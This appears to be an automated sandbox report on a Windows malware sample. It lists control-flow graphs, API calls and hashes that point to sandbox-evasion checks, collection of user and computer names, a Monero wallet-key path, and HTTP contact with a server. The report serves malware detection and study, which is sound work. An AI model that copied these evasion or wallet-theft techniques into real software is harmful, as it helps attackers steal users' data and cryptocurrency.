                                  control_flow_graph 1301 bb19f0-bb1a1d call bbade0 StrCmpCA 1304 bb1a1f-bb1a21 ExitProcess 1301->1304 1305 bb1a27-bb1a41 call bbade0 1301->1305 1309 bb1a44-bb1a48 1305->1309 1310 bb1a4e-bb1a61 1309->1310 1311 bb1c12-bb1c1d call bbab10 1309->1311 1313 bb1bee-bb1c0d 1310->1313 1314 bb1a67-bb1a6a 1310->1314 1313->1309 1316 bb1a99-bb1aa8 call bbab30 1314->1316 1317 bb1b1f-bb1b30 StrCmpCA 1314->1317 1318 bb1bdf-bb1be9 call bbab30 1314->1318 1319 bb1afd-bb1b0e StrCmpCA 1314->1319 1320 bb1a71-bb1a80 call bbab30 1314->1320 1321 bb1acf-bb1ae0 StrCmpCA 1314->1321 1322 bb1aad-bb1abe StrCmpCA 1314->1322 1323 bb1b63-bb1b74 StrCmpCA 1314->1323 1324 bb1b82-bb1b93 StrCmpCA 1314->1324 1325 bb1b41-bb1b52 StrCmpCA 1314->1325 1326 bb1ba1-bb1bb2 StrCmpCA 1314->1326 1327 bb1bc0-bb1bd1 StrCmpCA 1314->1327 1328 bb1a85-bb1a94 call bbab30 1314->1328 1316->1313 1342 bb1b3c 1317->1342 1343 bb1b32-bb1b35 1317->1343 1318->1313 1340 bb1b1a 1319->1340 1341 bb1b10-bb1b13 1319->1341 1320->1313 1338 bb1aee-bb1af1 1321->1338 1339 bb1ae2-bb1aec 1321->1339 1336 bb1aca 1322->1336 1337 bb1ac0-bb1ac3 1322->1337 1346 bb1b80 1323->1346 1347 bb1b76-bb1b79 1323->1347 1348 bb1b9f 1324->1348 1349 bb1b95-bb1b98 1324->1349 1344 bb1b5e 1325->1344 1345 bb1b54-bb1b57 1325->1345 1350 bb1bbe 1326->1350 1351 bb1bb4-bb1bb7 1326->1351 1330 bb1bdd 1327->1330 1331 bb1bd3-bb1bd6 1327->1331 1328->1313 1330->1313 1331->1330 1336->1313 1337->1336 1355 bb1af8 1338->1355 1339->1355 1340->1313 1341->1340 1342->1313 1343->1342 1344->1313 1345->1344 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00BB1A15
                                  • ExitProcess.KERNEL32 ref: 00BB1A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 00d2b4a4817434be63a03d2b5b038d837d9b5a35e0b3392338b7ba03fd96a82f
                                  • Instruction ID: 979970a3bf230cf2d00c559885b3012966ca0295502f9db336af3f269a903662
                                  • Opcode Fuzzy Hash: 00d2b4a4817434be63a03d2b5b038d837d9b5a35e0b3392338b7ba03fd96a82f
                                  • Instruction Fuzzy Hash: E3513CB5A04209EFCB14DF98D9A4BFE77F9EF44304F5048A8E816AB251E7B0E944CB51
                                  Function 00BB6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301358), ref: 00BB9BF1
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301208), ref: 00BB9C0A
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301250), ref: 00BB9C22
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301130), ref: 00BB9C3A
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,013011D8), ref: 00BB9C53
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01309548), ref: 00BB9C6B
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,012F6E68), ref: 00BB9C83
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,012F7188), ref: 00BB9C9C
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301160), ref: 00BB9CB4
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301178), ref: 00BB9CCC
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,013012C8), ref: 00BB9CE5
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301190), ref: 00BB9CFD
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,012F71A8), ref: 00BB9D15
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,013011F0), ref: 00BB9D2E
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BA11D0: ExitProcess.KERNEL32 ref: 00BA1211
                                    • Part of subcall function 00BA1160: GetSystemInfo.KERNEL32(?), ref: 00BA116A
                                    • Part of subcall function 00BA1160: ExitProcess.KERNEL32 ref: 00BA117E
                                    • Part of subcall function 00BA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BA112B
                                    • Part of subcall function 00BA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BA1132
                                    • Part of subcall function 00BA1110: ExitProcess.KERNEL32 ref: 00BA1143
                                    • Part of subcall function 00BA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BA123E
                                    • Part of subcall function 00BA1220: __aulldiv.LIBCMT ref: 00BA1258
                                    • Part of subcall function 00BA1220: __aulldiv.LIBCMT ref: 00BA1266
                                    • Part of subcall function 00BA1220: ExitProcess.KERNEL32 ref: 00BA1294
                                    • Part of subcall function 00BB6A10: GetUserDefaultLangID.KERNEL32 ref: 00BB6A14
                                    • Part of subcall function 00BA1190: ExitProcess.KERNEL32 ref: 00BA11C6
                                    • Part of subcall function 00BB79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7A10
                                    • Part of subcall function 00BB79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7A17
                                    • Part of subcall function 00BB79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB7A2F
                                    • Part of subcall function 00BB7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7AA0
                                    • Part of subcall function 00BB7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7AA7
                                    • Part of subcall function 00BB7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00BB7ABF
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013094D8,?,00BC10F4,?,00000000,?,00BC10F8,?,00000000,00BC0AF3), ref: 00BB6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB6D99
                                  • Sleep.KERNEL32(00001770), ref: 00BB6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,013094D8,?,00BC10F4,?,00000000,?,00BC10F8,?,00000000,00BC0AF3), ref: 00BB6DBA
                                  • ExitProcess.KERNEL32 ref: 00BB6DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: ac8ed910a7aa592bdf6c74f9eb4776c4f704619de1a4986bf10470eb2cfab236
                                  • Instruction ID: 0b44103eee5e1a5bdc05a14985661c1d62688dcc43ef52974d12aa6a476fbc72
                                  • Opcode Fuzzy Hash: ac8ed910a7aa592bdf6c74f9eb4776c4f704619de1a4986bf10470eb2cfab236
                                  • Instruction Fuzzy Hash: 0E311830E14208ABCB14FBE0DC57BFE77B9AF04300F5009A8F112A6192EFB06945C662
                                  Function 00BA1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 ba1220-ba1247 call bb8b40 GlobalMemoryStatusEx 1439 ba1249-ba1271 call bbdd30 * 2 1436->1439 1440 ba1273-ba127a 1436->1440 1441 ba1281-ba1285 1439->1441 1440->1441 1443 ba129a-ba129d 1441->1443 1444 ba1287 1441->1444 1446 ba1289-ba1290 1444->1446 1447 ba1292-ba1294 ExitProcess 1444->1447 1446->1443 1446->1447
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BA123E
                                  • __aulldiv.LIBCMT ref: 00BA1258
                                  • __aulldiv.LIBCMT ref: 00BA1266
                                  • ExitProcess.KERNEL32 ref: 00BA1294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 5ef23b61a15afd9c4843ead126f65883555b94f3ee6f674b780f1f683cac4342
                                  • Instruction ID: d6b5d418bcb540e4dbfae1aea4acf93058dd9de02eafdb38633ebe981302e0a6
                                  • Opcode Fuzzy Hash: 5ef23b61a15afd9c4843ead126f65883555b94f3ee6f674b780f1f683cac4342
                                  • Instruction Fuzzy Hash: E4011DB0D44308FBEF50DFE4CC4ABAEBBB8AB15705F248898E604B61C0D7B495458B59
                                  Function 00BB6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1450 bb6d93 1451 bb6daa 1450->1451 1453 bb6d5a-bb6d77 call bbade0 OpenEventA 1451->1453 1454 bb6dac-bb6dc2 call bb6bc0 call bb5d60 CloseHandle ExitProcess 1451->1454 1460 bb6d79-bb6d91 call bbade0 CreateEventA 1453->1460 1461 bb6d95-bb6da4 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013094D8,?,00BC10F4,?,00000000,?,00BC10F8,?,00000000,00BC0AF3), ref: 00BB6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB6D99
                                  • Sleep.KERNEL32(00001770), ref: 00BB6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,013094D8,?,00BC10F4,?,00000000,?,00BC10F8,?,00000000,00BC0AF3), ref: 00BB6DBA
                                  • ExitProcess.KERNEL32 ref: 00BB6DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 37b8e64e5bfdf837b615b91aecce99958b834d27dd903d016e3320b9a95c2597
                                  • Instruction ID: 1d1812f056274a8d80c05d2e839a65839992894f59a93be1def503b14c864fe3
                                  • Opcode Fuzzy Hash: 37b8e64e5bfdf837b615b91aecce99958b834d27dd903d016e3320b9a95c2597
                                  • Instruction Fuzzy Hash: 3EF05830A48209AFEB10EBA0DC4ABFE33B4EF04701F5009B5B616A51E1CBF45944CA62
                                  Function 00BA4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 429047109682d84d9472f6951e103b11a3a8d8afe6c3ecb63f8d1c535f6f69cb
                                  • Instruction ID: 0423f0b7ab355902e47c6904d2b2251cdcc32050aabcb946b212a991de4f993b
                                  • Opcode Fuzzy Hash: 429047109682d84d9472f6951e103b11a3a8d8afe6c3ecb63f8d1c535f6f69cb
                                  • Instruction Fuzzy Hash: D6215EB1D00209ABDF10DFA5EC46ADE7BB5FB04320F008665F925A7290EB706A09CB81
                                  Function 00BB5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA62D0: InternetOpenA.WININET(00BC0DFF,00000001,00000000,00000000,00000000), ref: 00BA6331
                                    • Part of subcall function 00BA62D0: StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA6353
                                    • Part of subcall function 00BA62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6385
                                    • Part of subcall function 00BA62D0: HttpOpenRequestA.WININET(00000000,GET,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA63D5
                                    • Part of subcall function 00BA62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA640F
                                    • Part of subcall function 00BA62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA6421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: db9440c7e0f55b726a211f9658c2fefa45c2c54dfaaf4b55d40387069432ffdc
                                  • Instruction ID: 248dfb4426716ef2848fead07e79715bf942eefea3a0c5a40dcb409da4eda4c0
                                  • Opcode Fuzzy Hash: db9440c7e0f55b726a211f9658c2fefa45c2c54dfaaf4b55d40387069432ffdc
                                  • Instruction Fuzzy Hash: 9411B170D10108ABCB24FF64D992BFD77B99F50340F5045E8F91A575A2EFB0AB04CAA2
                                  Function 00BB7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00BB7ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: c21a33e66d864a47ed11da3763cef6f58512ef3f136d68127ffb0cd419d40cf5
                                  • Instruction ID: f2ae9e88c00d02fa3f7c81a71f09b3ea7c919fab0a669c50c86d7ab1f348f89d
                                  • Opcode Fuzzy Hash: c21a33e66d864a47ed11da3763cef6f58512ef3f136d68127ffb0cd419d40cf5
                                  • Instruction Fuzzy Hash: 3B01D6B1948349EFC700CF89DC85FAEBBF8F744710F100169F515E2290D7B45A0487A1
                                  Function 00BA1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BA112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BA1132
                                  • ExitProcess.KERNEL32 ref: 00BA1143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
